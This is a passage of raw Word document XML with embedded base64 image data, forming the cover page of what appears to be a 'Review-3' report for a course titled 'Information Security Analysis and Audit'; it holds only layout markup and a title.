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&#10;SPxV8R7TxT2ovQGpnIMucv2fvvg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mjplMoEAAACFQAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAKAAAAAAAAACEA7QxqP32uAAB9rgAAFAAAAAAAAAAAAAAAAAAwBwAAZHJzL21lZGlhL2ltYWdl&#10;MS5wbmdQSwECLQAUAAYACAAAACEAFmjFzdwAAAAFAQAADwAAAAAAAAAAAAAAAADftQAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAA6LYAAGRy&#10;cy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAA27cAAAAA&#10;">
                <v:shape id="Shape 49170" o:spid="_x0000_s1027" style="position:absolute;left:459;top:9018;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W1xAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/LisIw&#10;FIb3wrxDOMLsNK14rUYZHAXBhXgBXR6aY1tsTkoTtb69WQguf/4b32zRmFI8qHaFZQVxNwJBnFpd&#10;cKbgdFx3xiCcR9ZYWiYFL3KwmP+0Zpho++Q9PQ4+E2GEXYIKcu+rREqX5mTQdW1FHLyrrQ36IOtM&#10;6hqfYdyUshdFQ2mw4PCQY0XLnNLb4W4UnHdZfFsdt/6eXjf/p/5lsHaTSqnfdvM3BeGp8d/wp73R&#10;CvqTeBQAAk5AATl/AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAL29lbXEAAAA3gAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l5768975,r,9144l,9144,,e" fillcolor="#5b9bd4" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5768975,9144"/>
                </v:shape>
                <v:rect id="Rectangle 21" o:spid="_x0000_s1028" style="position:absolute;left:36216;top:629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513C4DC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 22" o:spid="_x0000_s1029" style="position:absolute;top:751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672CE01" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 23" o:spid="_x0000_s1030" style="position:absolute;left:23930;top:10480;width:11276;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309E36A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:color w:val="5B9BD4"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>REVIEW</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 24" o:spid="_x0000_s1031" style="position:absolute;left:32421;top:10480;width:1228;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36B1EE8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:color w:val="5B9BD4"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25" o:spid="_x0000_s1032" style="position:absolute;left:33350;top:10480;width:174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9FA3B8D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:color w:val="5B9BD4"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>3</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 26" o:spid="_x0000_s1033" style="position:absolute;left:34661;top:10480;width:83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59A688F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:color w:val="5B9BD4"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 27" o:spid="_x0000_s1034" style="position:absolute;left:35271;top:10480;width:83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AB683D9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>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35" type="#_x0000_t75" style="position:absolute;left:22201;width:14008;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v4xQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NagJB&#10;EITvgu8wtJCLaG8MRN04ShASclDi3wN0djq7S3Z61pmJrm+fCQRyLKrqK2qx6myjLuxD7UTD/TgD&#10;xVI4U0up4XR8Gc1AhUhiqHHCGm4cYLXs9xaUG3eVPV8OsVQJIiEnDVWMbY4YioothbFrWZL36byl&#10;mKQv0Xi6JrhtcJJlj2iplrRQUcvriouvw7fV4BucP5y36D9mr2y3mx3Ww9271neD7vkJVOQu/of/&#10;2m9Gw3QCv1/SD8DlDwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCuAIv4xQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                  <v:imagedata r:id="rId8" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEBA6C0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="558"/>
        <w:ind w:right="159"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="427A48D1" wp14:editId="68484394">
                <wp:extent cx="5769610" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="39705" name="Group 39705"/>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49172" name="Shape 49172"/>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9705" style="width:454.3pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57696,95">
                <v:shape id="Shape 49173" style="position:absolute;width:57696;height:95;left:0;top:0;" coordsize="5769610,9525" path="m0,0l5769610,0l5769610,9525l0,9525l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#5b9bd4"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168D2C4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:ind w:left="3407" w:right="517" w:hanging="1921"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="375573CF" wp14:editId="6448AD61">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39707" name="Group 3970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174" name="Shape 491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5" name="Shape 49175"/>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176" name="Shape 49176"/>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7" name="Shape 49177"/>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178" name="Shape 49178"/>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07" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49179" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49180" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49181" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49182" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49183"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533052A1" wp14:editId="7FDED602">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39708" name="Group 3970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184" name="Shape 491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5" name="Shape 49185"/>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186" name="Shape 49186"/>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7" name="Shape 49187"/>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188" name="Shape 49188"/>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08" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49189" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49190" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49191" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49192" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49193"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5B9BD4"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INFORMATION SECURITY ANALYSIS AND AUDIT (F1+TF1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A79D4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
